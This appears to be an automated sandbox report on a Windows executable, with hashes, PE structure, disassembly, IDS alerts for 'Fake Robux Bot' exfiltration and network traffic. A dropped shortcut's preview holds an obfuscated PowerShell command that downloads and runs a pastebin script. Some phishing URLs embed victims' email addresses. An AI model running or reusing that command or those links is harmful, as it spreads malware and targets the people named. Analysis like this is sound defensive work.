                                                                                        https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 1.1.1.1
                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.90.114
                                                                                        ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                        • 188.114.96.3
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.20.4.235
                                                                                        • 162.159.138.232
                                                                                        • 185.199.109.133
                                                                                        No context
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                        Category:dropped
                                                                                        Size (bytes):1728
                                                                                        Entropy (8bit):4.527272298423835
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                        MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                        SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                        SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                        SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                                        Malicious:true
                                                                                        Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.890472898059848
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulp/lh:NllUp/l
                                                                                        MD5:33079FB821DDC3C0C3169070389E05AC
                                                                                        SHA1:CBE9016199CAF57FED3BAFA2AD960922C5DAECC5
                                                                                        SHA-256:335AA3A5D5715EC6B459D9702386A083ACF1636EB9B682A9A05FB470AC2352F5
                                                                                        SHA-512:785115207C136DE9D490C9BAE08BDECD206A7ADF7616D8FAF2CBC04320ECA3E3B996C9EF368561D8BF966CD691CB83819C4D4EC89848E2FDCC0ED308503D0F49
                                                                                        Malicious:false
                                                                                        Preview:@...e...............................R.>!.............@..........
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):72
                                                                                        Entropy (8bit):4.644610558622846
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:5FqvS0qfFXVbARV6oa:B0sVbz
                                                                                        MD5:FDF2E994BEA34B6B6F4B94DE701994AB
                                                                                        SHA1:B6F158090800D5706252CB4010AE55C77EA9CB27
                                                                                        SHA-256:7D681BAF6C76989E40D7669842EAC13A5A2115FED59D7DE645AEDA202206B5BD
                                                                                        SHA-512:788A36DCC54BB9AD0D6EE9501EFAC0A7FB65BCDE9060484E454BB98D334FAA5DFB3272FD38E39DC1F43E412FCB1274331CD6219B82214553E384A1BAA7280DE5
                                                                                        Malicious:false
                                                                                        Preview:[#] Usage : OSLdZanXNc.exe <Input x64 exe> <*Output*>..[#] Output : ....
                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Entropy (8bit):6.115613434611554
                                                                                        TrID:
                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:OSLdZanXNc.exe
                                                                                        File size:45'568 bytes
                                                                                        MD5:98ff253f6f854df7b7f6794a2761dbd1
                                                                                        SHA1:246ae6060c76a6751b6ba2d9ca0de18e298b5e26
                                                                                        SHA256:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
                                                                                        SHA512:4e8a028a5f8a49e734cdf58f2337a486c7268997296f1048d5481896452524873345b74cb31c9ffd47db1721c6b5c927542e2f979341459f7da6d70ac287972d
                                                                                        SSDEEP:768:DvoFKVVoTnsXSkAut5oIZ3tHgBqT35QMt4135P:DvoFKYg7TBZBSW5Q04j
                                                                                        TLSH:1F236BA5BA5100D8C47B4078C92BD2FDB2B2FC95074096EF4301866D3FB37E8A9B6715
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J..g...g...g.......g..}f...g.K.c...g..}d...g..}c...g..}b...g...f...g...f...g..zo...g..z....g..ze...g.Rich..g................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x140001e80
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x66FF04D1 [Thu Oct 3 20:55:45 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:a43d15331c9ee28121574258bd659d78
                                                                                        Instruction
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007F546C718AECh
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007F546C718597h
                                                                                        int3
                                                                                        int3
                                                                                        inc eax
                                                                                        push ebx
                                                                                        dec eax
                                                                                        sub esp, 20h
                                                                                        dec eax
                                                                                        mov ebx, ecx
                                                                                        xor ecx, ecx
                                                                                        call dword ptr [000081F3h]
                                                                                        dec eax
                                                                                        mov ecx, ebx
                                                                                        call dword ptr [000081F2h]
                                                                                        call dword ptr [000081DCh]
                                                                                        dec eax
                                                                                        mov ecx, eax
                                                                                        mov edx, C0000409h
                                                                                        dec eax
                                                                                        add esp, 20h
                                                                                        pop ebx
                                                                                        dec eax
                                                                                        jmp dword ptr [000081C0h]
                                                                                        dec eax
                                                                                        mov dword ptr [esp+08h], ecx
                                                                                        dec eax
                                                                                        sub esp, 38h
                                                                                        mov ecx, 00000017h
                                                                                        call dword ptr [000081A4h]
                                                                                        test eax, eax
                                                                                        je 00007F546C718729h
                                                                                        mov ecx, 00000002h
                                                                                        int 29h
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [0000A232h]
                                                                                        call 00007F546C7187CEh
                                                                                        dec eax
                                                                                        mov eax, dword ptr [esp+38h]
                                                                                        dec eax
                                                                                        mov dword ptr [0000A319h], eax
                                                                                        dec eax
                                                                                        lea eax, dword ptr [esp+38h]
                                                                                        dec eax
                                                                                        add eax, 08h
                                                                                        dec eax
                                                                                        mov dword ptr [0000A2A9h], eax
                                                                                        dec eax
                                                                                        mov eax, dword ptr [0000A302h]
                                                                                        dec eax
                                                                                        mov dword ptr [0000A173h], eax
                                                                                        dec eax
                                                                                        mov eax, dword ptr [esp+40h]
                                                                                        dec eax
                                                                                        mov dword ptr [0000A277h], eax
                                                                                        mov dword ptr [0000A14Dh], C0000409h
                                                                                        mov dword ptr [0000A147h], 00000001h
                                                                                        mov dword ptr [0000A151h], 00000001h
                                                                                        Programming Language:
                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb3fc0xb4.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x1e0.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0xd0000x588.pdata
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x30.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xa9e00x70.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa8a00x140.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xa0000x230.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x83cc0x84003f035b9a475e7b0bee14924a2ad04868False0.5557824337121212zlib compressed data6.326232743020032IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0xa0000x1c4a0x1e00c7352e598965211983a506bc2a8aa61bFalse0.42109375data4.731554548739669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0xc0000xaa80x20085c2aebd011c5c1b37c1009def59c2b6False0.09375data0.5324895658143383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0xd0000x5880x600a25f8001a8d46e8c51bd3ab1ecc507aeFalse0.4876302083333333data4.11853894347752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xe0000x1e00x200ae95088ed848b39aad014fdd45607fafFalse0.529296875data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0xf0000x300x20037d1b57c226da12c9be78a5fe517e953False0.123046875data0.7148111080262498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_MANIFEST0xe0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                        DLLImport
                                                                                        KERNEL32.dllUnmapViewOfFile, CloseHandle, GetFileSize, CreateFileMappingW, MapViewOfFile, ReadFile, CopyFileA, GetLastError, CreateFileA, WinExec, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetModuleHandleW
                                                                                        VCRUNTIME140.dll__current_exception, memmove, memcpy, memset, __current_exception_context, strrchr, __C_specific_handler
                                                                                        api-ms-win-crt-heap-l1-1-0.dllmalloc, free, realloc, _set_new_mode
                                                                                        api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __stdio_common_vsprintf, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
                                                                                        api-ms-win-crt-runtime-l1-1-0.dll_exit, _initialize_onexit_table, _register_onexit_function, _cexit, terminate, exit, _register_thread_local_exe_atexit_callback, _initterm_e, _initterm, __p___argv, _crt_atexit, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, __p___argc
                                                                                        api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                                        api-ms-win-crt-string-l1-1-0.dllstrncmp
                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishUnited States
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-15T15:54:30.522779+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.1255611162.159.138.232443TCP
                                                                                        2024-10-15T15:54:46.501030+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.1255624162.159.138.232443TCP
                                                                                        2024-10-15T15:54:53.884821+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.1255625162.159.138.232443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 15, 2024 15:54:09.016926050 CEST4971180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.021776915 CEST8049711185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:09.021857023 CEST4971180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.024914026 CEST4971180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:09.029725075 CEST8049711185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:09.616374969 CEST8049711185.199.109.133192.168.2.12
